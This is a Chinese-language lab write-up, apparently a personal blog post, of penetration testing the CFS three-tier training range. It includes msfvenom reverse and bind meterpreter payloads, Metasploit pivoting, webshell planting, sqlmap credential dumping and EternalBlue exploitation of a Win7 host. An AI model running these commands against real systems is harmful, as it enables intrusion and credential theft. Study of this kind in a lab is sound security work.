CFS三层靶机

环境搭建

密码均为:teamssix.com,拓扑如下

image-20241113213504275

1
2
3
4
5
Target1_CentOS7
宝塔后台登陆地址及密码:
地址:http://192.168.1.129:8888/a768f109/
账号:eaj3yhsl
密码:41bb8fee

添加自动分配ip的80端口,他这里的网站是宝塔搭建的,绑定的是原靶机的ip和端口,靶机又没固定ip,所以我们能访问ip的8888端口,不能访问80端口

image-20241113212119038

1
2
3
4
5
Target2_Ubuntu
宝塔后台登陆地址及密码:
地址:http://192.168.22.129:8888/2cc52ec0/
账号:xdynr37d
密码:123qwe..

同上

image-20241113212714118

配置好后取消-将主机虚拟适配器连接到此网络,这样主机就不能访问内网22和33

image-20241113212913268

配置好后及时保存快照

信息收集

nmap扫描

image-20241113214445386

21、22、3306端口开放,可以考虑hydra爆破看是否存在弱密码,但这里有80端口,先打开网站看看

image-20241113215111675

扫了下目录,发现flag1

image-20241113215622496

thinkphp网站,上工具

image-20241113215058445

发现数据库泄露账户密码,但显示127.0.0.1,还是尝试以下,不出意外远程连不上,但是还有rce

image-20241113220231920

这里直接使用工具的getshell,会在网站根目录下生成一个密码peiqi的peiqi.php一句话木马

连上以后,在网站根目录下发现flag2

image-20241113220309813

靶机根路径发现flag3

image-20241113220339014

内网渗透

centos查看网络,发现内网192.168.22.0/24

image-20241114121443406

上传木马

1
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.1.128 LPORT=4444 -f elf > 4444.elf

msf连接

1
2
3
4
5
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.128
set LPORT 4444
exploit

image-20241114173916201

添加路由

1
2
run autoroute -s 192.168.22.0/24
run autoroute -p

挂起,并开启代理

1
2
3
4
use auxiliary/server/socks_proxy
set SRVHOST 192.168.1.128
set SRVPORT 1080
exploit

vim /etc/proxychains4.conf 

1
socks5 0.0.0.0 1080

或者上传fscan,扫描内网,建议用fscan,msf代理太不稳定了

image-20241114152638408

nmap扫描结果

image-20241114154246381

ubuntu

访问192.168.22.129:80,存在sql注入

image-20241114160507450

可以sqlmap不能直接getshell,但是一跑sqlmap,shell连接直接断了,nmap都还没崩,只是超时,建议手工注入,得到账户密码后台登录,也可以爆破账户密码,毕竟是root:123qwe

image-20241114160708723

登录得到flag1,后台模板修改,注入webshell

image-20241114172049680

蚁剑连接后在网站根目录和靶机根目录得到flag2和flag3

image-20241114172115717

image-20241114172133725

查看内网

image-20241114172306710

fscan扫描

image-20241114172358920

生成木马

1
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > ubuntu.elf

msf连接ubuntu

1
2
3
4
5
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.129
set LPORT 3333
run

image-20241114172731106

发现内网192.168.33/24,同样添加路由

1
2
run autoroute -s 192.168.33.0/24
run autoroute -p

image-20241114172843735

win7

扫描是否存在永恒之蓝

1
2
3
use  auxiliary/scanner/smb/smb_ms17_010 
set RHOSTS 192.168.33.33
run

image-20241114181104381

执行

1
2
3
4
5
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 192.168.33.33
set LPORT 4444
run

还是代理原因,一直不成功,最好的一次打成蓝屏了

image-20241114205930633

将win7加到kali同一网段,成功,应该就是代理的问题,建议使用frps代理,

image-20241114215129714

后面用frps代理

1
2
3
4
5
6
7
8
9
10
11
# 爆一下数据库名称
proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword --dbs

sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks5://192.168.236.128:2222 -p keyword --dbs --batch
# 爆破 bagecms 库下的表
proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D "bagecms" --tables T "bage_admin" --batch
# 爆破 bage_admin 表的字段
proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D "bagecms" -T "bage_admin" --columns --batch
# 把 admin的账号密码给 dump出来
proxychains4 sqlmap -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump
# 测试了--is-dba,不是高权限,那就不尝试--os-shell了

sqlmap能正常跑了

image-20241115130720253

nmap扫描win7

image-20241115164952012

msf也能正常打了

image-20241115165821213

参考

【VulHub靶场】之CFS三层靶机内网渗透 - FreeBuf网络安全行业门户

CFS三层靶机-内网环境渗透 - 1vxyz - 博客园 (cnblogs.com)

CFS三层靶机搭建及其内网渗透_cfs三层内网渗透-CSDN博客

打穿你的内网之三层内网渗透 - 9eek - 博客园 (cnblogs.com)

CFS三层靶机
http://tmagwaro.github.io/2024/11/13/CFS三层靶机/
作者
TMagWarO
发布于
2024年11月13日
许可协议